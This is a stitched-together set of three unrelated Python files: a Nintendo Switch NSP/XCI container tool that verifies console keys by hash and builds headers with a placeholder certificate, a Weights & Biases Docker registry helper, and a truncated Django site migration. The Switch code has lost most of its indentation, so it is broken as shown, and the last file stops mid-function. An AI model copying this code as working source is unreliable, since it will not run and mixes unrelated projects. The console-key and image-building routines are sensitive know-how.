mkverifier='master_key_0'+str(counter)
else:
			mkverifier='master_key_'+str(counter)
if mkverifier in checkkeys:
print(mkverifier+" is present but program doesn't have the hash to verify the key")
for i in checkkeys:
if i==mkverifier:
mk =checkkeys[i][:]
sha=sha256(uhx(mk)).hexdigest()
print(' > HEX SHA256: '+sha)
print('')
counter+=1
for i in checkkeys:
if i == 'aes_kek_generation_source':
aes_kek_generation_source =checkkeys[i][:]
sha=sha256(uhx(aes_kek_generation_source)).hexdigest()
if sha != 'fc02b9d37b42d7a1452e71444f1f700311d1132e301a83b16062e72a78175085':
print('aes_kek_generation_source : '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'aes_key_generation_source':
aes_key_generation_source =checkkeys[i][:]
sha=sha256(uhx(aes_key_generation_source)).hexdigest()
if sha != 'fbd10056999edc7acdb96098e47e2c3606230270d23281e671f0f389fc5bc585':
				print('aes_key_generation_source : '+aes_key_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'titlekek_source':
titlekek_source=checkkeys[i][:]
sha=sha256(uhx(titlekek_source)).hexdigest()
if sha != 'c48b619827986c7f4e3081d59db2b460c84312650e9a8e6b458e53e8cbca4e87':
				print('titlekek_source: '+titlekek_source)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'key_area_key_application_source':
key_area_key_application_source=checkkeys[i][:]
sha=sha256(uhx(key_area_key_application_source)).hexdigest()
if sha != '04ad66143c726b2a139fb6b21128b46f56c553b2b3887110304298d8d0092d9e':
				print('key_area_key_application_source: '+key_area_key_application_source)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'key_area_key_ocean_source':
key_area_key_ocean_source=checkkeys[i][:]
sha=sha256(uhx(key_area_key_ocean_source)).hexdigest()
if sha != 'fd434000c8ff2b26f8e9a9d2d2c12f6be5773cbb9dc86300e1bd99f8ea33a417':
				print('key_area_key_ocean_source: '+key_area_key_ocean_source)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'key_area_key_system_source':
key_area_key_system_source=checkkeys[i][:]
sha=sha256(uhx(key_area_key_system_source)).hexdigest()
if sha != '1f17b1fd51ad1c2379b58f152ca4912ec2106441e51722f38700d5937a1162f7':
				print('key_area_key_system_source: '+key_area_key_system_source)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_00':
master_key_00=checkkeys[i][:]
sha=sha256(uhx(master_key_00)).hexdigest()
if sha != '0ee359be3c864bb0782e1d70a718a0342c551eed28c369754f9c4f691becf7ca':
				print('master_key_00: '+master_key_00)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_01':
master_key_01=checkkeys[i][:]
sha=sha256(uhx(master_key_01)).hexdigest()
if sha != '4fe707b7e4abdaf727c894aaf13b1351bfe2ac90d875f73b2e20fa94b9cc661e':
				print('master_key_01: '+master_key_01)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_02':
master_key_02=checkkeys[i][:]
sha=sha256(uhx(master_key_02)).hexdigest()
if sha != '79277c0237a2252ec3dfac1f7c359c2b3d121e9db15bb9ab4c2b4408d2f3ae09':
				print('master_key_02: '+master_key_02)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_03':
master_key_03=checkkeys[i][:]
sha=sha256(uhx(master_key_03)).hexdigest()
if sha != '4f36c565d13325f65ee134073c6a578ffcb0008e02d69400836844eab7432754':
				print('master_key_03: '+master_key_03)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_04':
master_key_04=checkkeys[i][:]
sha=sha256(uhx(master_key_04)).hexdigest()
if sha != '75ff1d95d26113550ee6fcc20acb58e97edeb3a2ff52543ed5aec63bdcc3da50':
				print('master_key_04: '+master_key_04)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_05':
master_key_05=checkkeys[i][:]
sha=sha256(uhx(master_key_05)).hexdigest()
if sha != 'ebe2bcd6704673ec0f88a187bb2ad9f1cc82b718c389425941bdc194dc46b0dd':
				print('master_key_05: '+master_key_05)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
		if i == 'master_key_06':
			master_key_06=checkkeys[i][:]
			sha=sha256(uhx(master_key_06)).hexdigest()
			if sha != '9497e6779f5d840f2bba1de4e95ba1d6f21efc94717d5ae5ca37d7ec5bd37a19':
				print('master_key_06: '+master_key_06)
				print(' > HEX SHA256: '+sha)
				print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
				startup=True
			print('')
if i == 'master_key_07':
master_key_07=checkkeys[i][:]
sha=sha256(uhx(master_key_07)).hexdigest()
if sha != '4ec96b8cb01b8dce382149443430b2b6ebcb2983348afa04a25e53609dabedf6':
				print('master_key_07: '+master_key_07)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_08':
master_key_08=checkkeys[i][:]
sha=sha256(uhx(master_key_08)).hexdigest()
if sha != '2998e2e23609bc2675ff062a2d64af5b1b78dff463b24119d64a1b64f01b2d51':
				print('master_key_08: '+master_key_08)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_09':
master_key_09=checkkeys[i][:]
sha=sha256(uhx(master_key_09)).hexdigest()
if sha != '9d486a98067c44b37cf173d3bf577891eb6081ff6b4a166347d9dbbf7025076b':
				print('master_key_09: '+master_key_09)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if (i == 'master_key_10' or i=='master_key_0a'):
master_key_10=checkkeys[i][:]
sha=sha256(uhx(master_key_10)).hexdigest()
if sha != '4ec5a237a75a083a9c5f6cf615601522a7f822d06bd4ba32612c9cebbb29bd45':
				print('master_key_10|master_key_0a: '+master_key_10)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'header_key':
header_key=checkkeys[i][:]
sha=sha256(uhx(header_key)).hexdigest()
if sha != '8e03de24818d96ce4f2a09b43af979e679974f7570713a61eed8b314864a11d5':
				print('header_key: '+header_key)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'xci_header_key':
xci_header_key=checkkeys[i][:]
sha=sha256(uhx(xci_header_key)).hexdigest()
if sha != '2e36cc55157a351090a73e7ae77cf581f69b0b6e48fb066c984879a6ed7d2e96':
				print('xci_header_key: '+xci_header_key)
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
return startup
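# Hedged note (added comment, not part of the original tool): both verifiers read a
# prod.keys-style text file of "name = HEXVALUE" lines and compare the SHA-256 of each
# decoded key against a known digest. verify_nkeys_startup() returns True when a
# required key is missing or fails verification, so a caller might do:
#   if verify_nkeys_startup('keys.txt'):
#       print('keys.txt is incomplete or has bad keys')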
def gen_nsp_header(files,fileSizes):
'''
for i in range(len(files)):
print (files[i])
print (fileSizes[i])
'''
filesNb = len(files)
stringTable = '\x00'.join(str(nca) for nca in files)
headerSize = 0x10 + (filesNb)*0x18 + len(stringTable)
remainder = 0x10 - headerSize%0x10
headerSize += remainder
fileOffsets = [sum(fileSizes[:n]) for n in range(filesNb)]
fileNamesLengths = [len(str(nca))+1 for nca in files] # +1 for the \x00
stringTableOffsets = [sum(fileNamesLengths[:n]) for n in range(filesNb)]
header = b''
header += b'PFS0'
header += pk('<I', filesNb)
header += pk('<I', len(stringTable)+remainder)
header += b'\x00\x00\x00\x00'
for n in range(filesNb):
header += pk('<Q', fileOffsets[n])
header += pk('<Q', fileSizes[n])
header += pk('<I', stringTableOffsets[n])
header += b'\x00\x00\x00\x00'
header += stringTable.encode()
header += remainder * b'\x00'
return header
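# Hedged usage sketch (file names and sizes below are made up): gen_nsp_header() builds
# a PFS0 partition header - the b'PFS0' magic, the entry count, the string-table size,
# one 0x18-byte entry (offset, size, name offset) per file, and a NUL-separated name
# table padded to a 0x10 boundary.
#   hdr = gen_nsp_header(['title.nca', 'title.cnmt.nca'], [0x4000, 0x2000])
#   assert hdr[:4] == b'PFS0'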
def get_xciheader(oflist,osizelist,sec_hashlist):
upd_list=list()
upd_fileSizes = list()
norm_list=list()
norm_fileSizes = list()
sec_list=oflist
sec_fileSizes = osizelist
sec_shalist = sec_hashlist
hfs0 = Fs.Hfs0(None, None)
root_header,upd_header,norm_header,sec_header,rootSize,upd_multiplier,norm_multiplier,sec_multiplier=hfs0.gen_rhfs0_head(upd_list,norm_list,sec_list,sec_fileSizes,sec_shalist)
#print (hx(root_header))
tot_size=0xF000+rootSize
signature=sq_tools.randhex(0x100)
signature= bytes.fromhex(signature)
sec_offset=root_header[0x90:0x90+0x8]
sec_offset=int.from_bytes(sec_offset, byteorder='little')
sec_offset=int((sec_offset+0xF000+0x200)/0x200)
sec_offset=sec_offset.to_bytes(4, byteorder='little')
back_offset=(0xFFFFFFFF).to_bytes(4, byteorder='little')
kek=(0x00).to_bytes(1, byteorder='big')
cardsize,access_freq=sq_tools.getGCsize(tot_size)
cardsize=cardsize.to_bytes(1, byteorder='big')
GC_ver=(0x00).to_bytes(1, byteorder='big')
GC_flag=(0x00).to_bytes(1, byteorder='big')
pack_id=(0x8750F4C0A9C5A966).to_bytes(8, byteorder='big')
valid_data=int(((tot_size-0x1)/0x200))
valid_data=valid_data.to_bytes(8, byteorder='little')
try:
Keys.get('xci_header_key')
key= Keys.get('xci_header_key')
key= bytes.fromhex(key)
IV=sq_tools.randhex(0x10)
IV= bytes.fromhex(IV)
xkey=True
#print(hx(IV))
except:
IV=(0x5B408B145E277E81E5BF677C94888D7B).to_bytes(16, byteorder='big')
xkey=False
HFS0_offset=(0xF000).to_bytes(8, byteorder='little')
len_rHFS0=(len(root_header)).to_bytes(8, byteorder='little')
sha_rheader=sha256(root_header[0x00:0x200]).hexdigest()
sha_rheader=bytes.fromhex(sha_rheader)
sha_ini_data=bytes.fromhex('1AB7C7B263E74E44CD3C68E40F7EF4A4D6571551D043FCA8ECF5C489F2C66E7E')
SM_flag=(0x01).to_bytes(4, byteorder='little')
TK_flag=(0x02).to_bytes(4, byteorder='little')
K_flag=(0x0).to_bytes(4, byteorder='little')
end_norm = sec_offset
header = b''
header += signature
header += b'HEAD'
header += sec_offset
header += back_offset
header += kek
header += cardsize
header += GC_ver
header += GC_flag
header += pack_id
header += valid_data
header += IV
header += HFS0_offset
header += len_rHFS0
header += sha_rheader
header += sha_ini_data
header += SM_flag
header += TK_flag
header += K_flag
header += end_norm
#Game_info
if xkey==True:
firm_ver='0100000000000000'
access_freq=access_freq
Read_Wait_Time='88130000'
Read_Wait_Time2='00000000'
Write_Wait_Time='00000000'
Write_Wait_Time2='00000000'
Firmware_Mode='00110C00'
CUP_Version='5a000200'
Empty1='00000000'
Upd_Hash='9bfb03ddbb7c5fca'
CUP_Id='1608000000000001'
Empty2='00'*0x38
#print(hx(Empty2))
firm_ver=bytes.fromhex(firm_ver)
access_freq=bytes.fromhex(access_freq)
Read_Wait_Time=bytes.fromhex(Read_Wait_Time)
Read_Wait_Time2=bytes.fromhex(Read_Wait_Time2)
Write_Wait_Time=bytes.fromhex(Write_Wait_Time)
Write_Wait_Time2=bytes.fromhex(Write_Wait_Time2)
Firmware_Mode=bytes.fromhex(Firmware_Mode)
CUP_Version=bytes.fromhex(CUP_Version)
Empty1=bytes.fromhex(Empty1)
Upd_Hash=bytes.fromhex(Upd_Hash)
CUP_Id=bytes.fromhex(CUP_Id)
Empty2=bytes.fromhex(Empty2)
Game_info = b''
Game_info += firm_ver
Game_info += access_freq
Game_info += Read_Wait_Time
Game_info += Read_Wait_Time2
Game_info += Write_Wait_Time
Game_info += Write_Wait_Time2
Game_info += Firmware_Mode
Game_info += CUP_Version
Game_info += Empty1
Game_info += Upd_Hash
Game_info += CUP_Id
Game_info += Empty2
gamecardInfoIV=IV[::-1]
crypto = aes128.AESCBC(key, gamecardInfoIV)
enc_info=crypto.encrypt(Game_info)
if xkey==False:
enc_info=sq_tools.get_enc_gameinfo(tot_size)
#print (hx(enc_info))
#Padding
sig_padding='00'*0x6E00
sig_padding=bytes.fromhex(sig_padding)
#print (hx(sig_padding))
#CERT
fake_CERT='FF'*0x8000
fake_CERT=bytes.fromhex(fake_CERT)
#print (hx(fake_CERT))
return header,enc_info,sig_padding,fake_CERT,root_header,upd_header,norm_header,sec_header,rootSize,upd_multiplier,norm_multiplier,sec_multiplier
def ret_nsp_offsets(filepath,kbsize=8):
kbsize=int(kbsize)
files_list=list()
try:
with open(filepath, 'r+b') as f:
data=f.read(int(kbsize*1024))
try:
head=data[0:4]
n_files=(data[4:8])
n_files=int.from_bytes(n_files, byteorder='little')
st_size=(data[8:12])
st_size=int.from_bytes(st_size, byteorder='little')
junk=(data[12:16])
offset=(0x10 + n_files * 0x18)
stringTable=(data[offset:offset+st_size])
stringEndOffset = st_size
headerSize = 0x10 + 0x18 * n_files + st_size
#print(head)
#print(str(n_files))
#print(str(st_size))
#print(str((stringTable)))
for i in range(n_files):
i = n_files - i - 1
pos=0x10 + i * 0x18
offset = data[pos:pos+8]
offset=int.from_bytes(offset, byteorder='little')
size = data[pos+8:pos+16]
size=int.from_bytes(size, byteorder='little')
nameOffset = data[pos+16:pos+20] # just the offset
nameOffset=int.from_bytes(nameOffset, byteorder='little')
name = stringTable[nameOffset:stringEndOffset].decode('utf-8').rstrip(' \t\r\n\0')
stringEndOffset = nameOffset
junk2 = data[pos+20:pos+24] # junk data
#print(name)
#print(offset)
#print(size)
off1=offset+headerSize
off2=off1+size
files_list.append([name,off1,off2,size])
files_list.reverse()
#print(files_list)
except BaseException as e:
Print.error('Exception: ' + str(e))
#print(files_list)
except BaseException as e:
Print.error('Exception: ' + str(e))
return files_list
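# Hedged usage sketch (the path is hypothetical): ret_nsp_offsets() parses the PFS0
# header of an NSP/NSZ and returns one [name, start_offset, end_offset, size] entry
# per file, with offsets absolute within the container.
#   for name, off1, off2, size in ret_nsp_offsets('game.nsp'):
#       print(name, hex(off1), size)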
def ret_xci_offsets(filepath,kbsize=8):
kbsize=int(kbsize)
files_list=list()
try:
with open(filepath, 'r+b') as f:
rawhead = io.BytesIO(f.read(int(0x200)))
data=rawhead.read()
#print(hx(data))
try:
rawhead.seek(0x100)
magic=rawhead.read(0x4)
if magic==b'HEAD':
#print(magic)
secureOffset=int.from_bytes(rawhead.read(4), byteorder='little')
secureOffset=secureOffset*0x200
with open(filepath, 'r+b') as f:
f.seek(secureOffset)
data=f.read(int(kbsize*1024))
rawhead = io.BytesIO(data)
rmagic=rawhead.read(0x4)
if rmagic==b'HFS0':
#print(rmagic)
head=data[0:4]
n_files=(data[4:8])
n_files=int.from_bytes(n_files, byteorder='little')
st_size=(data[8:12])
st_size=int.from_bytes(st_size, byteorder='little')
junk=(data[12:16])
offset=(0x10 + n_files * 0x40)
stringTable=(data[offset:offset+st_size])
stringEndOffset = st_size
headerSize = 0x10 + 0x40 * n_files + st_size
#print(head)
#print(str(n_files))
#print(str(st_size))
#print(str((stringTable)))
for i in range(n_files):
i = n_files - i - 1
pos=0x10 + i * 0x40
offset = data[pos:pos+8]
offset=int.from_bytes(offset, byteorder='little')
size = data[pos+8:pos+16]
size=int.from_bytes(size, byteorder='little')
nameOffset = data[pos+16:pos+20] # just the offset
nameOffset=int.from_bytes(nameOffset, byteorder='little')
name = stringTable[nameOffset:stringEndOffset].decode('utf-8').rstrip(' \t\r\n\0')
stringEndOffset = nameOffset
junk2 = data[pos+20:pos+24] # junk data
#print(name)
#print(offset)
#print(size)
off1=offset+headerSize+secureOffset
off2=off1+size
files_list.append([name,off1,off2,size])
# with open(filename, 'r+b') as f:
# f.seek(off1)
# print(f.read(0x4))
files_list.reverse()
#print(files_list)
except BaseException as e:
Print.error('Exception: ' + str(e))
except BaseException as e:
Print.error('Exception: ' + str(e))
return files_list
def ret_xci_offsets_fw(filepath,partition='update',kbsize=32):
kbsize=int(kbsize)
files_list=list()
try:
with open(filepath, 'r+b') as f:
rawhead = io.BytesIO(f.read(int(0x200)))
data=rawhead.read()
#print(hx(data))
try:
rawhead.seek(0x100)
magic=rawhead.read(0x4)
if magic==b'HEAD':
#print(magic)
HFS0_offset=0xF000
with open(filepath, 'r+b') as f:
f.seek(HFS0_offset)
data=f.read(int(8*1024))
rawhead = io.BytesIO(data)
rmagic=rawhead.read(0x4)
if rmagic==b'HFS0':
#print(rmagic)
head=data[0:4]
n_files=(data[4:8])
n_files=int.from_bytes(n_files, byteorder='little')
st_size=(data[8:12])
st_size=int.from_bytes(st_size, byteorder='little')
junk=(data[12:16])
offset=(0x10 + n_files * 0x40)
stringTable=(data[offset:offset+st_size])
stringEndOffset = st_size
headerSize = 0x10 + 0x40 * n_files + st_size
# print(head)
# print(str(n_files))
# print(str(st_size))
# print(str((stringTable)))
for i in range(n_files):
i = n_files - i - 1
pos=0x10 + i * 0x40
offset = data[pos:pos+8]
offset=int.from_bytes(offset, byteorder='little')
size = data[pos+8:pos+16]
size=int.from_bytes(size, byteorder='little')
nameOffset = data[pos+16:pos+20] # just the offset
nameOffset=int.from_bytes(nameOffset, byteorder='little')
name = stringTable[nameOffset:stringEndOffset].decode('utf-8').rstrip(' \t\r\n\0')
stringEndOffset = nameOffset
junk2 = data[pos+20:pos+24] # junk data
#print(name)
#print(offset)
#print(size)
off1=offset+headerSize+HFS0_offset
off2=off1+size
files_list.append([name,off1,off2,size])
# with open(filename, 'r+b') as f:
# f.seek(off1)
# print(f.read(0x4))
files_list.reverse()
# print(files_list)
updoffset=False
for file in files_list:
if file[0]==str(partition).lower():
updoffset=file[1]
break
files_list=list()
if updoffset!=False:
with open(filepath, 'r+b') as f:
f.seek(updoffset)
data=f.read(int(kbsize*1024))
rawhead = io.BytesIO(data)
a=rawhead.read()
# Hex.dump(a)
rawhead.seek(0)
rmagic=rawhead.read(0x4)
if rmagic==b'HFS0':
#print(rmagic)
head=data[0:4]
n_files=(data[4:8])
n_files=int.from_bytes(n_files, byteorder='little')
st_size=(data[8:12])
st_size=int.from_bytes(st_size, byteorder='little')
junk=(data[12:16])
offset=(0x10 + n_files * 0x40)
stringTable=(data[offset:offset+st_size])
stringEndOffset = st_size
headerSize = 0x10 + 0x40 * n_files + st_size
# print(head)
# print(str(n_files))
# print(str(st_size))
# print(str((stringTable)))
for i in range(n_files):
i = n_files - i - 1
pos=0x10 + i * 0x40
offset = data[pos:pos+8]
offset=int.from_bytes(offset, byteorder='little')
size = data[pos+8:pos+16]
size=int.from_bytes(size, byteorder='little')
nameOffset = data[pos+16:pos+20] # just the offset
nameOffset=int.from_bytes(nameOffset, byteorder='little')
name = stringTable[nameOffset:stringEndOffset].decode('utf-8').rstrip(' \t\r\n\0')
stringEndOffset = nameOffset
junk2 = data[pos+20:pos+24] # junk data
#print(name)
#print(offset)
#print(size)
off1=offset+headerSize+HFS0_offset
off2=off1+size
files_list.append([name,off1,off2,size])
# with open(filename, 'r+b') as f:
# f.seek(off1)
# print(f.read(0x4))
files_list.reverse()
# print(files_list)
except BaseException as e:
Print.error('Exception: ' + str(e))
except BaseException as e:
Print.error('Exception: ' + str(e))
return files_list
def count_content(filepath,filelist=None):
	counter=0
	files_list=filelist
	if files_list==None:
if filepath.endswith('.nsp')or filepath.endswith('.nsx') or filepath.endswith('.nsz') or filepath.endswith('.ns0'):
files_list=ret_nsp_offsets(filepath)
elif filepath.endswith('.xci') or filepath.endswith('.xcz') or filepath.endswith('.xc0'):
files_list=ret_xci_offsets(filepath)
for i in range(len(files_list)):
entry=files_list[i]
if str(entry[0]).endswith('cnmt.nca'):
counter+=1
return counter
def trimm_module_id(moduleid):
moduleid=str(moduleid)
while moduleid[-2:]=='00':
moduleid=moduleid[:-2]
return moduleid
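# Illustrative example (input is made up): trailing '00' byte pairs are stripped from
# a module/build id, e.g. trimm_module_id('a1b2c3000000') returns 'a1b2c3'.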
def get_mc_isize(filepath=None,files_list=None):
counter=0;size=0
if files_list==None:
files_list=[]
if filepath.endswith('.nsp')or filepath.endswith('.nsx') or filepath.endswith('.nsz') or filepath.endswith('.ns0'):
files_list=ret_nsp_offsets(filepath)
elif filepath.endswith('.xci') or filepath.endswith('.xcz') or filepath.endswith('.xc0'):
files_list=ret_xci_offsets(filepath)
if files_list!=None:
for i in range(len(files_list)):
entry=files_list[i]
size+=int(entry[3])
return size
def cnmt_type(type_n):
	ctype='Unknown'
	if str(hx(type_n)) == "b'1'":
ctype='SystemProgram'
if str(hx(type_n)) == "b'2'":
ctype='SystemData'
if str(hx(type_n)) == "b'3'":
ctype='SystemUpdate'
if str(hx(type_n)) == "b'4'":
ctype='BootImagePackage'
if str(hx(type_n)) == "b'5'":
ctype='BootImagePackageSafe'
if str(hx(type_n)) == "b'80'":
ctype='GAME'
if str(hx(type_n)) == "b'81'":
ctype='UPDATE'
if str(hx(type_n)) == "b'82'":
ctype='DLC'
if str(hx(type_n)) == "b'83'":
ctype='Delta'
return ctype
def file_real_size(filepath):
if filepath.endswith('.nsp')or filepath.endswith('.nsx') or filepath.endswith('.nsz'):
files_list=ret_nsp_offsets(filepath)
elif filepath.endswith('.xci') or filepath.endswith('.xcz'):
files_list=ret_xci_offsets(filepath)
last_file=files_list[-1]
realsize=last_file[2]
return realsize
def check_if_trimmed(filepath):
realsize=file_real_size(filepath)
size=os.path.getsize(filepath)
if size==realsize:
return True,realsize
else:
return False,realsize
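# Hedged usage sketch: check_if_trimmed() compares the file size on disk with the end
# offset of the last PFS0/HFS0 entry, so any extra bytes (for example a footer added
# by the function below) make it return (False, real_size).
#   trimmed, real_size = check_if_trimmed('game.nsp')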
def check_if_foot_signed(filepath,realsize,cryptokey=None):
with open(filepath, 'rb') as o:
o.seek(realsize)
if o.read(6)==b'FOOTER':
return True
else:
return False
def add_signed_footer(filepath,message=None,rewrite=False,encrypted=None,cryptokey=None):
result,realsize=check_if_trimmed(filepath)
if result==False and rewrite==False:
result2=check_if_foot_signed(filepath,realsize)
if result2==True:
print(filepath+' is already signed')
return True
if message==None:
message='Made with NSCB'
if encrypted==None:
crypto=(0x0).to_bytes(4, byteorder='little')
else:
crypto=(0x1).to_bytes(4, byteorder='little')
mss=message.encode(encoding='UTF-8')
footer = b''
footer += b'FOOTER'
footer += crypto
footer += (len(mss)).to_bytes(4, byteorder='little')
footer += mss
with open(filepath, 'rb+') as o:
o.seek(realsize)
o.write(footer)
o.seek(0, os.SEEK_END)
curr_off= o.tell()
remainder=curr_off%0x10
if remainder!=0:
while remainder!=0:
padd = b''
padd += (0x00).to_bytes(1, byteorder='little')
o.write(padd)
o.seek(0, os.SEEK_END)
curr_off= o.tell()
remainder=curr_off%0x10
print('Added message: "{}" to {}'.format(message,filepath))
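# Footer layout written by add_signed_footer() above (little-endian fields):
#   b'FOOTER' | 4-byte crypto flag | 4-byte message length | message bytes | zero padding to 0x10
# Hedged usage sketch (the message text is arbitrary):
#   add_signed_footer('game.nsp', message='Built with NSCB')
#   read_footer('game.nsp')     # prints the stored message
#   delete_footer('game.nsp')   # truncates the file back to its real size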
def read_footer(filepath,cryptokey=None):
result,realsize=check_if_trimmed(filepath)
if result==True:
print(filepath+" doesn't have a footer")
else:
with open(filepath, 'rb') as o:
o.seek(realsize)
if o.read(0x6)==b'FOOTER':
crypto=o.read(0x4)
footsize=int.from_bytes(o.read(0x4), byteorder='little', signed=False)
print(filepath)
print(' -> '+((o.read(footsize)).decode(encoding='UTF-8')))
else:
print(filepath)
print(" -> doesn't have a footer")
def delete_footer(filepath,cryptokey=None):
result,realsize=check_if_trimmed(filepath)
if result==True:
print(filepath+" doesn't have a footer")
else:
with open(filepath, 'rb+') as o:
o.seek(realsize)
if o.read(0x6)==b'FOOTER':
o.seek(realsize)
o.truncate()
print("Footer has been deleted from "+filepath)
else:
print(filepath+" doesn't have a footer")
def decompress_zip(filepath,ofolder,delete_after=False):
import zipfile
if not os.path.isdir(filepath):
with zipfile.ZipFile(filepath, 'r') as zipf:
zipf.extractall(ofolder)
if delete_after==True:
try:
os.remove(filepath)
except:pass
else:
from listmanager import folder_to_list
file_list=folder_to_list(filepath,['zip'])
for filepath in file_list:
with zipfile.ZipFile(filepath, 'r') as zipf:
zipf.extractall(ofolder)
if delete_after==True:
try:
os.remove(filepath)
except:pass
|
the-stack_106_15944
|
import os
import requests
import six
import logging
from wandb.docker import auth
from wandb.docker import www_authenticate
import subprocess
entrypoint = os.path.join(os.path.dirname(
os.path.abspath(__file__)), "wandb-entrypoint.sh")
auth_config = auth.load_config()
log = logging.getLogger(__name__)
def shell(cmd):
"Simple wrapper for calling docker, returning None on error and the output on success"
try:
return subprocess.check_output(['docker'] + cmd, stderr=subprocess.STDOUT).decode('utf8').strip()
except subprocess.CalledProcessError:
return None
def default_image(gpu=False):
tag = "all"
if not gpu:
tag += "-cpu"
return "wandb/deepo:%s" % tag
def parse_repository_tag(repo_name):
parts = repo_name.rsplit('@', 1)
if len(parts) == 2:
return tuple(parts)
parts = repo_name.rsplit(':', 1)
if len(parts) == 2 and '/' not in parts[1]:
return tuple(parts)
return repo_name, None
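# Illustrative examples (image names are made up):
#   parse_repository_tag('wandb/deepo:all-cpu')  -> ('wandb/deepo', 'all-cpu')
#   parse_repository_tag('repo@sha256:abc123')   -> ('repo', 'sha256:abc123')
#   parse_repository_tag('ubuntu')               -> ('ubuntu', None)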
def parse(image_name):
repository, tag = parse_repository_tag(image_name)
registry, repo_name = auth.resolve_repository_name(repository)
if registry == "docker.io":
registry = "index.docker.io"
return registry, repo_name, tag or "latest"
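# Illustrative example (assumes the default Docker Hub resolution in wandb.docker.auth):
#   parse('wandb/deepo:all-cpu') -> ('index.docker.io', 'wandb/deepo', 'all-cpu')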
def auth_token(registry, repo):
"""Makes a request to the root of a v2 docker registry to get the auth url.
    Always returns a dictionary; if there's no token key, we couldn't authenticate.
"""
# TODO: Cache tokens?
auth_info = auth_config.resolve_authconfig(registry)
if auth_info:
normalized = {k.lower(): v for k, v in six.iteritems(auth_info)}
auth_info = (normalized.get("username"), normalized.get("password"))
response = requests.get("https://{}/v2/".format(registry), timeout=3)
if response.headers.get("www-authenticate"):
try:
info = www_authenticate.parse(response.headers['www-authenticate'])
except ValueError:
info = {}
else:
log.error("Received {} when attempting to authenticate with {}".format(
response, registry))
info = {}
if info.get("bearer"):
res = requests.get(info["bearer"]["realm"] +
"?service={}&scope=repository:{}:pull".format(
info["bearer"]["service"], repo), auth=auth_info, timeout=3)
res.raise_for_status()
return res.json()
return {}
def image_id_from_registry(image_name):
"""Get the docker id from a public or private registry"""
registry, repository, tag = parse(image_name)
res = None
try:
token = auth_token(registry, repository).get("token")
# dockerhub is crazy
if registry == "index.docker.io":
registry = "registry-1.docker.io"
res = requests.head("https://{}/v2/{}/manifests/{}".format(registry, repository, tag), headers={
"Authorization": "Bearer {}".format(token),
"Accept": "application/vnd.docker.distribution.manifest.v2+json"
}, timeout=5)
res.raise_for_status()
except requests.RequestException:
log.error("Received {} when attempting to get digest for {}".format(
res, image_name))
return None
return "@".join([registry+"/"+repository, res.headers["Docker-Content-Digest"]])
def image_id(image_name):
"""Retreve the image id from the local docker daemon or remote registry"""
if "@sha256:" in image_name:
return image_name
else:
return shell(['inspect', image_name, '--format', '{{index .RepoDigests 0}}']) or image_id_from_registry(image_name)
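# Hedged usage sketch (the image name is illustrative): image_id() prefers the local
# daemon's RepoDigests entry and falls back to querying the registry over HTTP.
#   digest = image_id('wandb/deepo:all-cpu')
#   # -> something like 'wandb/deepo@sha256:...' from the daemon,
#   #    a registry-qualified digest from the fallback, or None on failure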
|
the-stack_106_15945
|
from django.conf import settings
from django.db import migrations
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.db.migrations.state import StateApps
def update_default_site(apps: StateApps, schema_editor: BaseDatabaseSchemaEditor):
Site = apps.get_model('sites', 'Site') # noqa: N806
# A default site object may or may not exist.
# If this is a brand-new database, the post_migrate will not fire until the very end of the
# "migrate" command, so the sites app will not have created a default site object yet.
    # If this is an existing database, the sites app will likely have created a default site
# object already.
Site.objects.update_or_create(
pk=settings.SITE_ID, defaults={'domain': 'api.isic-archive.com', 'name': 'ISIC Archive'}
)
def rollback_default_site(apps: StateApps, schema_editor: BaseDatabaseSchemaEditor):
Site = apps.get_model('sites', 'Site') # noqa: N806
# This is the initial value of the default site object, as populated by the sites app.
# If it doesn't exist for some reason, there is nothing to roll back.
